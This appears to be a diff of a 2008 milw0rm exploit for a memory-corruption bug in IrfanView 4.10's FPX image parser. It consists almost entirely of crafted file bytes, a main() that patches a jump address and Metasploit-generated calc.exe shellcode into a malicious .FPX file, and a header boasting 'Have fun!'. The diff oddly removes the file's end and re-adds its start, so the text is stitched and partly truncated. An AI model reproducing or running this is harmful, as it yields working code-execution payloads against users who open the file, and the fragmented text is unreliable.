-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfc\xfa\xfb\xf9\xf6"
-"\xfc\xfa\xf7\xfb\xf9\xf5\xfd\xfb\xfa\xfd\xfb\xfa\xfd\xfc\xfa\xfd"
-"\xfb\xf9\xf6\xf6\xf5\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xf7\xf7\xf8\xf2\xf2\xf2\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf9\xf9"
-"\xf9\xf2\xf3\xf3\xed\xee\xee\xdb\xdc\xdc\xe3\xe3\xe3\xda\xdb\xdb"
-"\xe5\xe5\xe5\xf0\xf0\xf0\xee\xee\xee\xda\xda\xda\xed\xed\xed\xfc"
-"\xfc\xfc\xd8\xd8\xd8\xf8\xf8\xf8\xec\xec\xed\xe9\xe9\xe9\xde\xde"
-"\xde\xe1\xe1\xe2\xdd\xde\xde\xcf\xd0\xd0\xfa\xfa\xfa\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xed\xed"
-"\xed\xd8\xd9\xda\xd2\xd3\xd4\xb0\xb1\xb2\xb5\xb6\xb6\xd1\xd2\xd2"
-"\xb4\xb4\xb3\xd1\xd1\xd0\xc9\xc9\xc9\xad\xad\xad\xcc\xcd\xcd\xf5"
-"\xf5\xf5\xbf\xbf\xbf\xdf\xdf\xde\x9d\x9d\x9d\xb6\xb7\xb7\xc6\xc7"
-"\xc7\xc6\xc7\xc7\xcc\xcc\xcc\xc9\xc9\xca\xf3\xf3\xf3\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xfa"
-"\xfa\xea\xea\xea\xe9\xe9\xe9\xe5\xe5\xe5\xec\xec\xec\xe0\xe1\xe1"
-"\xdb\xdb\xdb\xe0\xe1\xe0\xe8\xe8\xe8\xe1\xe1\xe1\xf1\xf1\xf1\xfd"
-"\xfd\xfd\xd5\xd5\xd5\xec\xec\xec\xf4\xf4\xf4\xf1\xf1\xf1\xe4\xe4"
-"\xe4\xe7\xe7\xe6\xc8\xc9\xc9\xd7\xd7\xd7\xf9\xf9\xf9\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xf7\xf7\xf7\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe"
-"\xfe\xfe\xf7\xf7\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xf5\xf5\xf5\xf7\xf7\xf7\xfe\xfe\xfe\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xfc\xfc\xfc\xfb\xfb\xfb\xfc\xfc\xfc\xf8\xf8"
-"\xf8\xf1\xf1\xf1\xf4\xf4\xf4\xf3\xf4\xf4\xf8\xf8\xf8\xfa\xfa\xfa"
-"\xf5\xf5\xf5\xf5\xf5\xf5\xf7\xf7\xf7\xf7\xf7\xf7\xf5\xf5\xf5\xf5"
-"\xf5\xf5\xfb\xfb\xfb\xff\xff\xff\xfe\xfe\xfe\xf5\xf5\xf5\xf6\xf6"
-"\xf7\xfd\xfd\xfd\xf2\xf2\xf2\xf9\xf9\xf9\xfb\xfb\xfb\xf7\xf7\xf7"
-"\xf3\xf3\xf3\xfb\xfc\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xf2\xf2\xf2\xd7\xd7\xd7\xd7\xd7\xd7\xcf\xcf"
-"\xcf\xc7\xc8\xc7\xcc\xcd\xcd\xca\xca\xcb\xca\xca\xca\xd3\xd3\xd4"
-"\xcc\xcd\xcd\xc7\xc8\xc8\xc4\xc5\xc5\xd4\xd5\xd5\xc4\xc4\xc4\xc7"
-"\xc8\xc7\xdb\xdc\xdb\xbe\xbf\xbf\xba\xbb\xbc\xc2\xc3\xc4\xd0\xd1"
-"\xd2\xef\xef\xef\xc6\xc6\xc6\xcc\xcd\xcd\xdb\xdb\xdc\xc9\xca\xc9"
-"\xc6\xc6\xc6\xe7\xe7\xe7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xf7\xf7\xf7\xbf\xbf\xc0\xa4\xa5\xa6\xb0\xb1"
-"\xb0\xbd\xbe\xbd\xc3\xc4\xc5\xc1\xc2\xc2\xaf\xaf\xb0\xb2\xb3\xb4"
-"\xb4\xb5\xb6\xb4\xb5\xb5\xb7\xb7\xb7\xca\xcb\xcc\xac\xae\xad\xae"
-"\xb0\xaf\xbe\xbe\xbe\x94\x95\x94\xe5\xe5\xe6\xaa\xab\xab\xba\xbb"
-"\xbc\xe4\xe4\xe5\xd3\xd4\xd4\xb3\xb3\xb3\xb0\xb0\xb0\xb9\xba\xba"
-"\xc0\xc1\xc2\xe7\xe7\xe8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfd\xfd\xfc\xfc"
-"\xfc\xfb\xfb\xfb\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xf4\xf4\xf4\xfd\xfd\xfd\xfd\xfd\xfd\xfa\xfa\xfa"
-"\xf2\xf2\xf2\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x03\x00\x01\x00\x03\x00"
-"\x02\x00\x03\x00\x13\x10\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00"
-"\x03\x00\x00\x00\x04\x00\x00\x00";
-
-
-
-int main(int argc, char* argv[])
-{
-	FILE* fpxfile;
-	char evilbuff[110000];
-	int offset=0;
-
-	printf("[+] Irfanview 4.10 .FPX File Memory Corruption\n");
-	printf("[+] Coded and discovered by Marsu \n");
-	if (argc!=2) {
-		printf("[+] Usage: %s \n",argv[0]);
-		return 0;
-	}
-
-	memset(evilbuff,0,110000);
-	memcpy(evilbuff,FPX_file1,sizeof(FPX_file1)-1);
-	offset=sizeof(FPX_file1)-1;
-	memcpy(evilbuff+offset,FPX_file2,sizeof(FPX_file2)-1);
-	offset+=sizeof(FPX_file2)-1;
-	memcpy(evilbuff+offset,FPX_file3,sizeof(FPX_file3)-1);
-	offset+=sizeof(FPX_file3)-1;
-	memcpy(evilbuff+offset,FPX_file4,sizeof(FPX_file4)-1);
-	offset+=sizeof(FPX_file4)-1;
-	memcpy(evilbuff+offset,FPX_file5,sizeof(FPX_file5)-1);
-	offset+=sizeof(FPX_file5)-1;
-	memcpy(evilbuff+offset,FPX_file6,sizeof(FPX_file6)-1);
-	offset+=sizeof(FPX_file6)-1;
-	memcpy(evilbuff+offset,FPX_file7,sizeof(FPX_file7)-1);
-	offset+=sizeof(FPX_file7)-1;
-	memcpy(evilbuff+offset,FPX_file8,sizeof(FPX_file8)-1);
-	offset+=sizeof(FPX_file8)-1;
-
-	memcpy(evilbuff+0x5c3a,"\x90\xeb\x07\xcc\x56\x7B\x01\x10\x41\x41\x41\x41",12); //change this to debug
-	memcpy(evilbuff+0x5c3a+12,CalcShellcode,sizeof(CalcShellcode)-1);
-
-	printf("[+] FPX file patched!\n");
-
-	if ((fpxfile=fopen(argv[1],"wb"))==0) {
-		printf("[-] Unable to access file.\n");
-		return 0;
-	}
-
-	fwrite( evilbuff, 1, 102952, fpxfile );
-	fclose(fpxfile);
-	printf("[+] Done. Have fun!\n");
-	return 0;
-}
-
-// milw0rm.com [2008-01-28]
+/***************************************************************************
+*              IrfanView 4.10 .FPX File Memory Corruption                  *
+*                                                                          *
+* This exploit launches calc.exe.                                          *
+*                                                                          *
+* Tested against Win XP SP2 FR.                                            *
+* Have Fun!                                                                *
+*                                                                          *
+* Coded and discovered by Marsu                *
+*                                                                          *
+* Other bugs exist...                                                      *
+***************************************************************************/
+
+#include "stdio.h"
+#include "stdlib.h"
+#include "string.h"
+
+/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
+unsigned char CalcShellcode[] =
+"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26"
+"\x45\x32\xe3\x83\xeb\xfc\xe2\xf4\xda\xad\x76\xe3\x26\x45\xb9\xa6"
